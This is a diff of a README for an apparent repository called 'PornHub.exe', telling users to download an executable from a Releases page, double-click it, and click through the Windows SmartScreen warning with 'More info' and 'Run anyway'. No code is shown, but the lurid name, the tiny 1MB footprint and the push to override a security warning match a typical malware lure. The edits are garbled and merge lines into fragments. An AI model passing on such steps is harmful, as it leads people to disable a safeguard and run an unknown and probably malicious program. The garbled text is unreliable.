PandaManOfficial420/PornHub.exe/README.md

 Installation

-       Download the PornHub.exe file from the Releases page
+                   Download the PornHub.exe file from the Releases page Double-click PornHub.exe

-            Double-click PornHub.exe

                    If Windows shows a warning (“Windows protected your PC”):

-                Click More info
+                   Click More
                    Click Run anyway
 Requirements

-                 Windows 10 or later

-                 At least 4 GB RAM

-                 1MB free disk space
+                   Windows 10 or At least 4 GB RAM 1MB free disk space!